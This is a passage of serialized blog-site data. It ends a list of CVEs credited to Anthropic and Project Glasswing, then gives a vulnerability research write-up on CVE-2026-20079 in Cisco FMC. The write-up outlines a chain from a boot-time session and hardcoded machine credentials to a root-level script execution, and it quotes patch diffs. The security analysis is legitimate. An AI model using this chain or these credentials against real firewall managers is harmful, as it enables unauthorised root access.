,3902,3903],{},"CVE-2026-2788",[341,3905,3692],{},[341,3907,3069],{},[341,3909,3596],{},[341,3911,3699],{},[341,3913,3702],{},[313,3915,3916,3919,3921,3923,3925,3927],{},[341,3917,3918],{},"CVE-2026-2789",[341,3920,3692],{},[341,3922,3069],{},[341,3924,3596],{},[341,3926,3761],{},[341,3928,3702],{},[313,3930,3931,3934,3936,3938,3940,3942],{},[341,3932,3933],{},"CVE-2026-2791",[341,3935,3692],{},[341,3937,3069],{},[341,3939,3596],{},[341,3941,3699],{},[341,3943,3702],{},[313,3945,3946,3949,3951,3953,3955,3957],{},[341,3947,3948],{},"CVE-2026-2796",[341,3950,3692],{},[341,3952,3069],{},[341,3954,3596],{},[341,3956,3699],{},[341,3958,3702],{},[313,3960,3961,3964,3966,3968,3970,3972],{},[341,3962,3963],{},"CVE-2026-2797",[341,3965,3692],{},[341,3967,3069],{},[341,3969,3596],{},[341,3971,3761],{},[341,3973,3702],{},[313,3975,3976,3979,39
81,3983,3985,3987],{},[341,3977,3978],{},"CVE-2026-2799",[341,3980,3692],{},[341,3982,3069],{},[341,3984,3596],{},[341,3986,3761],{},[341,3988,3702],{},[313,3990,3991,3994,3996,3998,4000,4003],{},[341,3992,3993],{},"CVE-2026-2804",[341,3995,3692],{},[341,3997,3069],{},[341,3999,3596],{},[341,4001,4002],{},"5.4",[341,4004,3702],{},[313,4006,4007,4010,4012,4014,4016,4018],{},[341,4008,4009],{},"CVE-2026-2805",[341,4011,3692],{},[341,4013,3069],{},[341,4015,3596],{},[341,4017,3699],{},[341,4019,3702],{},[313,4021,4022,4025,4028,4030,4032,4034],{},[341,4023,4024],{},"CVE-2026-4702",[341,4026,4027],{},"2026-03-24",[341,4029,3069],{},[341,4031,3596],{},[341,4033,3699],{},[341,4035,3702],{},[313,4037,4038,4041,4043,4045,4047,4050],{},[341,4039,4040],{},"CVE-2026-4704",[341,4042,4027],{},[341,4044,3069],{},[341,4046,3596],{},[341,4048,4049],{},"7.5",[341,4051,3702],{},[313,4053,4054,4057,4059,4061,4063,4065],{},[341,4055,4056],{},"CVE-2026-4705",[341,4058,4027],{},[341,4060,3069],{},[341,4062,3596],{},[341,4064,3699],{},[341,4066,3702],{},[313,4068,4069,4072,4074,4076,4078,4081],{},[341,4070,4071],{},"CVE-2026-4718",[341,4073,4027],{},[341,4075,3069],{},[341,4077,3596],{},[341,4079,4080],{},"8.1",[341,4082,3702],{},[313,4084,4085,4088,4090,4092,4094,4096],{},[341,4086,4087],{},"CVE-2026-4723",[341,4089,4027],{},[341,4091,3069],{},[341,4093,3596],{},[341,4095,3699],{},[341,4097,3702],{},[313,4099,4100,4103,4105,4107,4109,4112],{},[341,4101,4102],{},"CVE-2026-4724",[341,4104,4027],{},[341,4106,3069],{},[341,4108,3596],{},[341,4110,4111],{},"9.1",[341,4113,3702],{},[313,4115,4116,4119,4121,4123,4125,4128],{},[341,4117,4118],{},"CVE-2026-27654",[341,4120,4027],{},[341,4122,3613],{},[341,4124,3616],{},[341,4126,4127],{},"8.2",[341,4129,4130],{},"Calif.io in collaboration with Claude and Anthropic 
Research",[313,4132,4133,4136,4139,4141,4143,4145],{},[341,4134,4135],{},"CVE-2026-4747",[341,4137,4138],{},"2026-03-26",[341,4140,3623],{},[341,4142,3623],{},[341,4144,3761],{},[341,4146,4147],{},"Nicholas Carlini using Claude, Anthropic",[313,4149,4150,4153,4156,4158,4160,4162],{},[341,4151,4152],{},"CVE-2026-28386",[341,4154,4155],{},"2026-04-07",[341,4157,3632],{},[341,4159,3632],{},[341,4161,4111],{},[341,4163,4164],{},"Stanislav Fort (Aisle Research); Pavel Kohout (Aisle Research); Alex Gaynor (Anthropic)",[313,4166,4167,4170,4173,4175,4177,4180],{},[341,4168,4169],{},"CVE-2026-5194",[341,4171,4172],{},"2026-04-09",[341,4174,3604],{},[341,4176,3604],{},[341,4178,4179],{},"9.3",[341,4181,4182],{},"Nicholas Carlini from Anthropic",[313,4184,4185,4188,4190,4192,4194,4197],{},[341,4186,4187],{},"CVE-2026-5446",[341,4189,4172],{},[341,4191,3604],{},[341,4193,3604],{},[341,4195,4196],{},"6.0",[341,4198,4130],{},[313,4200,4201,4204,4206,4208,4210,4213],{},[341,4202,4203],{},"CVE-2026-5503",[341,4205,4172],{},[341,4207,3604],{},[341,4209,3604],{},[341,4211,4212],{},"6.9",[341,4214,4130],{},[313,4216,4217,4220,4222,4224,4226,4229],{},[341,4218,4219],{},"CVE-2026-5447",[341,4221,4172],{},[341,4223,3604],{},[341,4225,3604],{},[341,4227,4228],{},"6.3",[341,4230,4130],{},[313,4232,4233,4236,4239,4241,4243,4246],{},[341,4234,4235],{},"CVE-2026-5466",[341,4237,4238],{},"2026-04-10",[341,4240,3604],{},[341,4242,3604],{},[341,4244,4245],{},"7.6",[341,4247,4130],{},[313,4249,4250,4253,4255,4257,4259,4261],{},[341,4251,4252],{},"CVE-2026-5477",[341,4254,4238],{},[341,4256,3604],{},[341,4258,3604],{},[341,4260,4127],{},[341,4262,4130],{},[313,4264,4265,4268,4270,4272,4274,4276],{},[341,4266,4267],{},"CVE-2026-5479",[341,4269,4238],{},[341,4271,3604],{},[341,4273,3604],{},[341,4275,4245],{},[341,4277,4130],{},[313,4279,4280,4283,4285,4287,4289,4292],{},[341,4281,4282],{},"CVE-2026-5500",[341,4284,4238],{},[341,4286,3604],{},[341,4288,3604],{},[341,4290,4291],{},"8.7",[341,4293,413
0],{},[313,4295,4296,4299,4301,4303,4305,4308],{},[341,4297,4298],{},"CVE-2026-5501",[341,4300,4238],{},[341,4302,3604],{},[341,4304,3604],{},[341,4306,4307],{},"8.6",[341,4309,4130],{},[18,4311,4312],{},"CVEs Added Post Blog Publication",[307,4314,4315,4331],{},[310,4316,4317],{},[313,4318,4319,4321,4323,4325,4327,4329],{},[316,4320,3669],{},[316,4322,3672],{},[316,4324,3581],{},[316,4326,3584],{},[316,4328,3679],{},[316,4330,3682],{},[336,4332,4333],{},[313,4334,4335,4338,4340,4343,4346,4348],{},[341,4336,4337],{},"CVE-2026-5588",[341,4339,3483],{},[341,4341,4342],{},"Legion of the Bouncy Castle Inc.",[341,4344,4345],{},"BC-JAVA",[341,4347,4228],{},[341,4349,4147],{},[61,4351,4353],{"id":4352},"what-vulnerabilities-are-directly-attributable-to-glasswing","What Vulnerabilities Are Directly Attributable to Glasswing?",[18,4355,4356],{},"Despite the attention around Glasswing, only one publicly disclosed CVE can currently be directly tied to it. CVE-2026-4747 (FreeBSD NFS RCE) is explicitly attributed to Glasswing and Mythos Preview by name, described as fully autonomously identified and exploited.",[18,4358,4359],{},"The Glasswing page also references three vulnerabilities without CVE numbers: a 27-year-old OpenBSD flaw, a 16-year-old FFmpeg bug, and Linux kernel privilege escalation chains. All three are still under embargo pending patches.",[18,4361,4362],{},"The broader limitation is that Anthropic committed the details of additional findings via cryptographic hashes prior to public disclosure as they are currently under embargo until a patch is released and the vulnerability is publicly disclosed. The full picture won't be known until public disclosure takes place and Anthropic has indicated a public summary report is expected around July 2026.",[18,4364,4365,4366,59],{},"The July 2026 report will be the real tell. 
When Anthropic follows through with a full public accounting of what Glasswing found and fixed, it will provide broader visibility into the details you might be looking for. Until then, the best signals available are the CVE credits field and Anthropic's own advisories at ",[47,4367,3555],{"href":3553,"rel":4368},[51],[61,4370,4372],{"id":4371},"considerations-for-anthropic","Considerations for Anthropic",[18,4374,4375],{},"It would be beneficial for Anthropic to create a dedicated security advisory page where security advisories and vulnerability disclosures were published in a consistent way, to provide a way for consumers to understand the question: what vulnerabilities have been discovered by the Anthropic research team and Project Glasswing?",[61,4377,202],{"id":201},[18,4379,205],{},[18,4381,208],{},[18,4383,211,4384,217],{},[47,4385,216],{"href":214,"rel":4386},[51],{"title":219,"searchDepth":220,"depth":220,"links":4388},[4389,4390,4391,4392,4393,4394,4395],{"id":3520,"depth":220,"text":20},{"id":3540,"depth":220,"text":3541},{"id":3559,"depth":220,"text":3560},{"id":3653,"depth":220,"text":3654},{"id":4352,"depth":220,"text":4353},{"id":4371,"depth":220,"text":4372},{"id":201,"depth":220,"text":202},"2026-04-15T10:00:00-05:00","A primary source breakdown of every CVE publicly credited to Anthropic researchers and Project Glasswing, based on a full search of the CVE record database.",{"slug":4399},"anthropic-glasswing-cves","\u002Fblog\u002Fanthropic-glasswing-cves",{"title":3477,"description":4397},"blog\u002Fanthropic-glasswing-cves",[242,243],"1H6hc1aWEZKVKkJ3iEcdi_3kYV_LUNB-4wAe5zqkcEE",{"id":4406,"title":4407,"articles":7,"authors":4408,"body":4414,"date":10377,"description":10378,"extension":234,"image":7,"link":7,"meta":10379,"navigation":237,"path":10381,"seo":10382,"series":7,"stem":10383,"subtype":7,"tags":10384,"__hash__":10385},"blog\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079.md","CVE-2026-20079 - Cisco FMC Authentication Bypass RCE 
Analysis",[4409],{"name":4410,"avatar":4411,"link":4412,"linkName":4413},"Cale Black","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U072UD3MW56-12d631dac54f-512","https:\u002F\u002Fhosakacorp.net","hosakacorp.net",{"type":15,"value":4415,"toc":10365},[4416,4419,4433,4437,4448,4451,4507,4511,4514,4531,4538,4542,4550,4558,4565,4576,4579,4582,4589,4607,4613,4619,4955,4961,4967,5017,5031,5035,5042,5346,5353,5360,5370,5621,5631,5652,5655,6223,6226,6248,6266,6273,6337,6526,6536,6595,6785,6791,6794,6800,6804,6807,6813,6816,6857,6883,6886,6893,6902,6927,6937,7104,7126,7225,7246,7252,7256,7275,7725,7735,7748,7764,7868,7883,8215,8226,8604,8617,8621,8624,8692,8703,8769,8830,8922,8925,8945,9096,9099,9239,9248,9275,9278,9361,9490,9494,9513,9965,9978,10109,10112,10289,10301,10307,10317,10326,10328,10345,10362],[263,4417],{":list":4418,"ico":266,"title":20},"[\"CVE-2026-20079 is a CVSS 10.0 RCE vulnerability in Cisco Secure Firewall Management Center\",\"VulnCheck's Initial Access Intelligence team developed an exploit that proved the vulnerability is exploitable but has significant prerequisites\",\"In this blog, our team walks through practical exploit development steps and the hurdles we encountered along the way\"]",[18,4420,4421,4422,4427,4428,4432],{},"On March 4, 2026, Cisco published an advisory for CVE-2026-20079, a CVSS 10.0 vulnerability in Cisco Secure Firewall Management Center (FMC). Since Cisco networking gear tends to be a common adversary target, our Initial Access Intelligence team’s interest was immediately piqued. 
Censys ",[47,4423,4426],{"href":4424,"rel":4425},"https:\u002F\u002Fplatform.censys.io\u002Fsearch?q=host.services.endpoints.http.headers%3A%28key%3D%22Server%22+and+value%3A%22Mojolicious+%28Perl%29%22%29+and+host.services.endpoints.http.body%3A%22Management+Center%22+and+host.services.endpoints.http.body%3A%22%2Fimg%2Fcisco-icon.svg%22",[51],"finds"," about 300 Cisco FMC instances on the public internet, while FOFA ",[47,4429,4426],{"href":4430,"rel":4431},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=c2VydmVyPSJNb2pvbGljaW91cyAoUGVybCkiICYmIGJvZHk9Ik1hbmFnZW1lbnQgQ2VudGVyIiAmJiBib2R5PSIvaW1nL2Npc2NvLWljb24uc3ZnP3Yi",[51]," between 600 and 700 exposed systems. This blog goes into detail on the exploit development process for CVE-2026-20079, which was an unexpectedly wild ride.",[61,4434,4436],{"id":4435},"spoiler-the-end-result","Spoiler: The End Result",[18,4438,4439,4440,4443,4444,4447],{},"CVE-2026-20079 arises when a startup process on the FMC system creates a partial ",[886,4441,4442],{},"csm_processes"," session in the ",[886,4445,4446],{},"sfsnort.sessions"," database. 
If no users authenticate after the system boots, the session persists and can be upgraded into permissions usable by an attacker, who could then call a significant set of CGI scripts.",[18,4449,4450],{},"VulnCheck identified that certain scripts could be chained such that a low-privileged session ID could be upgraded into a UI login session, after which RCE is possible via a multi-step process:",[22,4452,4453,4458,4473,4479,4486,4500],{},[25,4454,2245,4455,4457],{},[886,4456,4442],{}," session is created in the database at boot and is marked as machine process with a static session ID, instead of a dynamic UUID like the rest of the system",[25,4459,2245,4460,4462,4463,4465,4466,4469,4470,59],{},[886,4461,4442],{}," session ID could be upgraded into a UI session via hardcoded credentials with the report user, which then uses the ",[886,4464,4442],{}," session UI permissions to allow authentication. This creates a set of required session parameters that are needed for accessing the API calls, namely ",[886,4467,4468],{},"sf_action_id",". The hardcoded machine user credentials are ",[886,4471,4472],{},"report:snortrules",[25,4474,4475,4476,4478],{},"The report user session is then granted the rights to view the UI pages containing the ",[886,4477,4468],{}," (no actual user privileges are assigned), which is extracted.",[25,4480,4481,4482,4485],{},"An arbitrary file write is conducted on sajaxintf.cgi via the all user-privileged validateLicense bulk AJAX API endpoint, which writes Unicode-escaped data to ",[886,4483,4484],{},"\u002Fvar\u002Ftmp\u002Flicense.tmp",". 
For the purposes of our exploit, we wrote a special shell script with the \"Makeself\" Cisco-defined format that utilizes several hardcoded strings.",[25,4487,4488,4489,4492,4493,4496,4497,4499],{},"The shell script that we wrote to license.tmp is then executed by calling the \"all\"-privileged allowed ",[886,4490,4491],{},"pjb.cgi"," endpoint with the ",[886,4494,4495],{},"SF::UI::DataObjectLibrary::upgradeReadinessCall"," and calling the ",[886,4498,4484],{}," shell script as the target.",[25,4501,4502,4503,4506],{},"The FMC system then processes the license.tmp file as an upgrade script and triggers an \"install\" process that ends up executing a ",[886,4504,4505],{},"SF::System::Wrappers::RunCmd"," Perl function that runs the script as root.",[993,4508,4510],{"id":4509},"exploitation-prerequisites","Exploitation Prerequisites",[18,4512,4513],{},"In order for the authentication bypass to succeed, the FMC host must have been rebooted, and the session must still exist in the database. Our team identified several instances where the required session will not be present, which would prevent exploitation until the system reboots. 
Any of the following may clear the injected session:",[22,4515,4516,4522,4525],{},[25,4517,4518,4519,4521],{},"Dashboard and widget interaction from authenticated users clears the \"old sessions,\" including the old ",[886,4520,4442],{}," session",[25,4523,4524],{},"Cloud managed sessions interactioning with the web UI",[25,4526,4527,4528,4530],{},"Periodic cleanups are triggered on account authentication, which happens sporadically for the automated ",[886,4529,4442],{}," user.",[18,4532,4533,4534,4537],{},"This means that it's likely the only time the target will be exploitable is shortly after boot, ",[1131,4535,4536],{},"or"," on systems that aren’t commonly interacted with or directly authenticated to the web UI.",[61,4539,4541],{"id":4540},"root-cause-analysis","Root Cause Analysis",[18,4543,2245,4544,4549],{},[47,4545,4548],{"href":4546,"rel":4547},"https:\u002F\u002Fsec.cloudapps.cisco.com\u002Fsecurity\u002Fcenter\u002Fcontent\u002FCiscoSecurityAdvisory\u002Fcisco-sa-onprem-fmc-authbypass-5JPp45V2",[51],"Cisco advisory"," for CVE-2026-20079 states that:",[1925,4551,4552,4555],{},[18,4553,4554],{},"A vulnerability in the web interface of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to bypass authentication and execute script files on an affected device to obtain root access to the underlying operating system.",[18,4556,4557],{},"This vulnerability is due to an improper system process that is created at boot time. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. 
A successful exploit could allow the attacker to execute a variety of scripts and commands that allow root access to the device.",[18,4559,4560,4561,4564],{},"To our hacker ears this says very little, and by not saying a lot, the things it ",[1131,4562,4563],{},"does"," say matter a ton:",[22,4566,4567,4570],{},[25,4568,4569],{},"The boot time statement tells me that something is up with session handling at system boot time",[25,4571,4572,4573,4575],{},"The vulnerability’s being unauthenticated immediately tells me that the boot time process enabled some session manipulation to reach management scripts, ",[1131,4574,4536],{}," that some hard-coded process allows a set of known values to be manipulated into a real session.",[18,4577,4578],{},"The only way to know was to dig in.",[18,4580,4581],{},"After patch diffing, a few things became apparent: The FMC system was a complex set of APIs that used Apache HTTPD redirects and proxy rewrites to access a large set of  Perl, Java, and Go services running on the host, and the changes related to CVE-2026-20079 were relatively small.",[18,4583,4584,4585,4588],{},"The primary changes were to the Apache HTTPD configuration file and to the ",[886,4586,4587],{},"\u002FVolume\u002F7.7.12-3\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm"," Perl Mojolicious CGI authentication handler, with a grand total of around 25 lines of code changed. Great, this should be easy, right? (This is a literary device called foreshadowing.)",[18,4590,4591,4592,4595,4596,4599,4600,4603,4604,4606],{},"The first change was to the ",[886,4593,4594],{},"httpsd_conf.tt"," template located at ",[886,4597,4598],{},"\u002FVolume\u002F7.7.12-3\u002Fsf\u002Fhtdocs\u002Ftemplates\u002Fhtml_templates\u002Fstig\u002Fhttpsd_conf.tt",". This is used as a template to generate the configuration for the Apache web service that functions as the main entry point for routing on FMC. 
The changes below show that the only addition was to add a check for whether the remote address is from the local system, and if it is, to set a ",[886,4601,4602],{},"X-Auth-User-Type"," header to ",[886,4605,467],{},":",[1354,4608,4611],{"className":4609,"code":4610,"language":1359},[1357],"SetEnvIf Remote_Addr ^127\\.0\\.0\\.1$|^::1$ request_is_local\nRequestHeader set X-Auth-User-Type 1 env=!request_is_local\n",[886,4612,4610],{"__ignoreMap":219},[18,4614,4615,4616,4618],{},"A corresponding addition was made to the Perl authentication handling library at ",[886,4617,4587],{},", which adds the following validation for the previously added header; if a session exists for an account and the header type does not match the expected user type, it will trigger an unauthorized error:",[1354,4620,4624],{"className":4621,"code":4622,"language":4623,"meta":219,"style":219},"language-perl shiki shiki-themes material-theme-lighter github-light github-dark monokai","# verify user type\nif ($session) {\n    my $userTypeFromSession = $session->param('usertype');\n    my $userTypeFromHeader;\n    if (ref($q) eq 'Mojo::Message::Request') {\n        $userTypeFromHeader = $q->headers->header('X-Auth-User-Type');\n    } else {\n        $userTypeFromHeader = $q->http('X-Auth-User-Type');\n    }\n    if (\n        defined $userTypeFromHeader &&\n        $userTypeFromHeader == AUTH_IS_USER &&\n        defined $userTypeFromSession &&\n        $userTypeFromSession != AUTH_IS_USER\n    ) {\n        my $username = $session->param('username');\n        warn \"CheckLogin: Incorrect user type: $userTypeFromHeader != $userTypeFromSession ($username)\";\n        return 0 if $hasReturnFlag;\n        Unauthorized($q, $session);\n    }\n}\n","perl",[886,4625,4626,4632,4648,4681,4690,4722,4754,4766,4790,4796,4804,4815,4823,4833,4841,4847,4875,4913,4929,4945,4950],{"__ignoreMap":219},[1373,4627,4628],{"class":1375,"line":1376},[1373,4629,4631],{"class":4630},"ss7Ak","# verify user 
type\n",[1373,4633,4634,4638,4642,4645],{"class":1375,"line":220},[1373,4635,4637],{"class":4636},"sRxSC","if",[1373,4639,4641],{"class":4640},"ss--_"," (",[1373,4643,4644],{"class":1383},"$",[1373,4646,4647],{"class":4640},"session) {\n",[1373,4649,4650,4654,4657,4660,4662,4665,4668,4671,4673,4676,4678],{"class":1375,"line":1266},[1373,4651,4653],{"class":4652},"sTNss","    my",[1373,4655,4656],{"class":1383}," $",[1373,4658,4659],{"class":4640},"userTypeFromSession = ",[1373,4661,4644],{"class":1383},[1373,4663,4664],{"class":4640},"session",[1373,4666,4667],{"class":1397},"->",[1373,4669,4670],{"class":4640},"param(",[1373,4672,1388],{"class":1387},[1373,4674,4675],{"class":1391},"usertype",[1373,4677,1388],{"class":1387},[1373,4679,4680],{"class":4640},");\n",[1373,4682,4683,4685,4687],{"class":1375,"line":1852},[1373,4684,4653],{"class":4652},[1373,4686,4656],{"class":1383},[1373,4688,4689],{"class":4640},"userTypeFromHeader;\n",[1373,4691,4693,4696,4698,4701,4703,4705,4708,4711,4714,4717,4719],{"class":1375,"line":4692},5,[1373,4694,4695],{"class":4636},"    if",[1373,4697,4641],{"class":4640},[1373,4699,4700],{"class":1379},"ref",[1373,4702,1384],{"class":4640},[1373,4704,4644],{"class":1383},[1373,4706,4707],{"class":4640},"q) ",[1373,4709,4710],{"class":1379},"eq",[1373,4712,4713],{"class":1387}," '",[1373,4715,4716],{"class":1391},"Mojo::Message::Request",[1373,4718,1388],{"class":1387},[1373,4720,4721],{"class":4640},") {\n",[1373,4723,4725,4728,4731,4733,4736,4738,4741,4743,4746,4748,4750,4752],{"class":1375,"line":4724},6,[1373,4726,4727],{"class":1383},"        $",[1373,4729,4730],{"class":4640},"userTypeFromHeader = 
",[1373,4732,4644],{"class":1383},[1373,4734,4735],{"class":4640},"q",[1373,4737,4667],{"class":1397},[1373,4739,4740],{"class":4640},"headers",[1373,4742,4667],{"class":1397},[1373,4744,4745],{"class":4640},"header(",[1373,4747,1388],{"class":1387},[1373,4749,4602],{"class":1391},[1373,4751,1388],{"class":1387},[1373,4753,4680],{"class":4640},[1373,4755,4757,4760,4763],{"class":1375,"line":4756},7,[1373,4758,4759],{"class":4640},"    } ",[1373,4761,4762],{"class":4636},"else",[1373,4764,4765],{"class":4640}," {\n",[1373,4767,4769,4771,4773,4775,4777,4779,4782,4784,4786,4788],{"class":1375,"line":4768},8,[1373,4770,4727],{"class":1383},[1373,4772,4730],{"class":4640},[1373,4774,4644],{"class":1383},[1373,4776,4735],{"class":4640},[1373,4778,4667],{"class":1397},[1373,4780,4781],{"class":4640},"http(",[1373,4783,1388],{"class":1387},[1373,4785,4602],{"class":1391},[1373,4787,1388],{"class":1387},[1373,4789,4680],{"class":4640},[1373,4791,4793],{"class":1375,"line":4792},9,[1373,4794,4795],{"class":4640},"    }\n",[1373,4797,4799,4801],{"class":1375,"line":4798},10,[1373,4800,4695],{"class":4636},[1373,4802,4803],{"class":4640}," (\n",[1373,4805,4807,4810,4812],{"class":1375,"line":4806},11,[1373,4808,4809],{"class":1379},"        defined",[1373,4811,4656],{"class":1383},[1373,4813,4814],{"class":4640},"userTypeFromHeader &&\n",[1373,4816,4818,4820],{"class":1375,"line":4817},12,[1373,4819,4727],{"class":1383},[1373,4821,4822],{"class":4640},"userTypeFromHeader == AUTH_IS_USER &&\n",[1373,4824,4826,4828,4830],{"class":1375,"line":4825},13,[1373,4827,4809],{"class":1379},[1373,4829,4656],{"class":1383},[1373,4831,4832],{"class":4640},"userTypeFromSession &&\n",[1373,4834,4836,4838],{"class":1375,"line":4835},14,[1373,4837,4727],{"class":1383},[1373,4839,4840],{"class":4640},"userTypeFromSession != AUTH_IS_USER\n",[1373,4842,4844],{"class":1375,"line":4843},15,[1373,4845,4846],{"class":4640},"    ) 
{\n",[1373,4848,4850,4853,4855,4858,4860,4862,4864,4866,4868,4871,4873],{"class":1375,"line":4849},16,[1373,4851,4852],{"class":4652},"        my",[1373,4854,4656],{"class":1383},[1373,4856,4857],{"class":4640},"username = ",[1373,4859,4644],{"class":1383},[1373,4861,4664],{"class":4640},[1373,4863,4667],{"class":1397},[1373,4865,4670],{"class":4640},[1373,4867,1388],{"class":1387},[1373,4869,4870],{"class":1391},"username",[1373,4872,1388],{"class":1387},[1373,4874,4680],{"class":4640},[1373,4876,4878,4881,4884,4887,4889,4892,4895,4897,4900,4902,4904,4906,4908,4910],{"class":1375,"line":4877},17,[1373,4879,4880],{"class":1379},"        warn",[1373,4882,4883],{"class":1387}," \"",[1373,4885,4886],{"class":1391},"CheckLogin: Incorrect user type: ",[1373,4888,4644],{"class":1383},[1373,4890,4891],{"class":4640},"userTypeFromHeader",[1373,4893,4894],{"class":1391}," != ",[1373,4896,4644],{"class":1383},[1373,4898,4899],{"class":4640},"userTypeFromSession",[1373,4901,4641],{"class":1391},[1373,4903,4644],{"class":1383},[1373,4905,4870],{"class":4640},[1373,4907,2230],{"class":1391},[1373,4909,183],{"class":1387},[1373,4911,4912],{"class":4640},";\n",[1373,4914,4916,4919,4922,4924,4926],{"class":1375,"line":4915},18,[1373,4917,4918],{"class":4636},"        return",[1373,4920,4921],{"class":4640}," 0 ",[1373,4923,4637],{"class":4636},[1373,4925,4656],{"class":1383},[1373,4927,4928],{"class":4640},"hasReturnFlag;\n",[1373,4930,4932,4935,4937,4940,4942],{"class":1375,"line":4931},19,[1373,4933,4934],{"class":4640},"        Unauthorized(",[1373,4936,4644],{"class":1383},[1373,4938,4939],{"class":4640},"q, ",[1373,4941,4644],{"class":1383},[1373,4943,4944],{"class":4640},"session);\n",[1373,4946,4948],{"class":1375,"line":4947},20,[1373,4949,4795],{"class":4640},[1373,4951,4953],{"class":1375,"line":4952},21,[1373,4954,1855],{"class":4640},[18,4956,4957,4958,4530],{},"These two changes let us know that the authentication bug relates to the \"user type\" and that any 
interaction with the web UI will force the user type to be a specific value. This, in turn, means that the authentication bug likely has to do with a non-",[886,4959,4960],{},"AUTH_IS_USER",[18,4962,2245,4963,4966],{},[886,4964,4965],{},"Auth.pm"," file defines a set of user types:",[1354,4968,4970],{"className":4621,"code":4969,"language":4623,"meta":219,"style":219},"use constant AUTH_IS_NONE => 0;\nuse constant AUTH_IS_USER => 1;\nuse constant AUTH_IS_MACHINE => 2;\n",[886,4971,4972,4990,5003],{"__ignoreMap":219},[1373,4973,4974,4977,4980,4984,4987],{"class":1375,"line":1376},[1373,4975,4976],{"class":4636},"use",[1373,4978,4979],{"class":4640}," constant ",[1373,4981,4983],{"class":4982},"sHBcC","AUTH_IS_NONE",[1373,4985,4986],{"class":1397}," =>",[1373,4988,4989],{"class":4640}," 0;\n",[1373,4991,4992,4994,4996,4998,5000],{"class":1375,"line":220},[1373,4993,4976],{"class":4636},[1373,4995,4979],{"class":4640},[1373,4997,4960],{"class":4982},[1373,4999,4986],{"class":1397},[1373,5001,5002],{"class":4640}," 1;\n",[1373,5004,5005,5007,5009,5012,5014],{"class":1375,"line":1266},[1373,5006,4976],{"class":4636},[1373,5008,4979],{"class":4640},[1373,5010,5011],{"class":4982},"AUTH_IS_MACHINE",[1373,5013,4986],{"class":1397},[1373,5015,5016],{"class":4640}," 2;\n",[18,5018,5019,5020,5022,5023,1554,5025,5027,5028,5030],{},"So we also know that the vulnerability is likely related to the ",[886,5021,5011],{}," user type, as the Apache changes force the web server interaction into a ",[886,5024,467],{},[886,5026,4960],{}," state. 
Time to start hunting for the potential users and authentication mechanisms for the ",[886,5029,5011],{}," type.",[61,5032,5034],{"id":5033},"what-is-a-user-after-all","What is a User After All?",[18,5036,5037,5038,5041],{},"After searching the Perl code base and checking the database, we identified that the following are hardcoded user credentials that are extracted from the ",[886,5039,5040],{},"\u002FVolume\u002F7.7.11-1061\u002Fsf\u002Fbin\u002Frepair_users.pl"," script:",[1354,5043,5045],{"className":4621,"code":5044,"language":4623,"meta":219,"style":219},"# Now create other system users\ncreate_user(\"report\", \"ReportUser\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"report\", \"snortrules\");\ncreate_user(\"sftop10user\", \"Top10User\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"sftop10user\", \"snortrules\");\ncreate_user(\"SRU\", \"SRUuser\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"SRU\", \"snortrules\");\ncreate_user(\"Sourcefire\", \"SourcefireUser\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"Sourcefire\", \"snortrules\");\ncreate_user(\"csm_processes\", \"csm_processes\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"csm_processes\", \"csmdaemon\");\n",[886,5046,5047,5052,5093,5115,5153,5173,5211,5231,5269,5289,5325],{"__ignoreMap":219},[1373,5048,5049],{"class":1375,"line":1376},[1373,5050,5051],{"class":4630},"# Now create other system 
users\n",[1373,5053,5054,5057,5059,5062,5064,5066,5068,5071,5073,5075,5077,5080,5082,5084,5086,5088,5090],{"class":1375,"line":220},[1373,5055,5056],{"class":4640},"create_user(",[1373,5058,183],{"class":1387},[1373,5060,5061],{"class":1391},"report",[1373,5063,183],{"class":1387},[1373,5065,1246],{"class":4640},[1373,5067,183],{"class":1387},[1373,5069,5070],{"class":1391},"ReportUser",[1373,5072,183],{"class":1387},[1373,5074,1246],{"class":4640},[1373,5076,183],{"class":1387},[1373,5078,5079],{"class":1391},"none",[1373,5081,183],{"class":1387},[1373,5083,1246],{"class":4640},[1373,5085,183],{"class":1387},[1373,5087,5079],{"class":1391},[1373,5089,183],{"class":1387},[1373,5091,5092],{"class":4640},", SF::Auth::AUTH_IS_MACHINE, 0);\n",[1373,5094,5095,5098,5100,5102,5104,5106,5108,5111,5113],{"class":1375,"line":1266},[1373,5096,5097],{"class":4640},"change_password(",[1373,5099,183],{"class":1387},[1373,5101,5061],{"class":1391},[1373,5103,183],{"class":1387},[1373,5105,1246],{"class":4640},[1373,5107,183],{"class":1387},[1373,5109,5110],{"class":1391},"snortrules",[1373,5112,183],{"class":1387},[1373,5114,4680],{"class":4640},[1373,5116,5117,5119,5121,5124,5126,5128,5130,5133,5135,5137,5139,5141,5143,5145,5147,5149,5151],{"class":1375,"line":1852},[1373,5118,5056],{"class":4640},[1373,5120,183],{"class":1387},[1373,5122,5123],{"class":1391},"sftop10user",[1373,5125,183],{"class":1387},[1373,5127,1246],{"class":4640},[1373,5129,183],{"class":1387},[1373,5131,5132],{"class":1391},"Top10User",[1373,5134,183],{"class":1387},[1373,5136,1246],{"class":4640},[1373,5138,183],{"class":1387},[1373,5140,5079],{"class":1391},[1373,5142,183],{"class":1387},[1373,5144,1246],{"class":4640},[1373,5146,183],{"class":1387},[1373,5148,5079],{"class":1391},[1373,5150,183],{"class":1387},[1373,5152,5092],{"class":4640},[1373,5154,5155,5157,5159,5161,5163,5165,5167,5169,5171],{"class":1375,"line":4692},[1373,5156,5097],{"class":4640},[1373,5158,183],{"class":1387},[1373,5160,5123],{
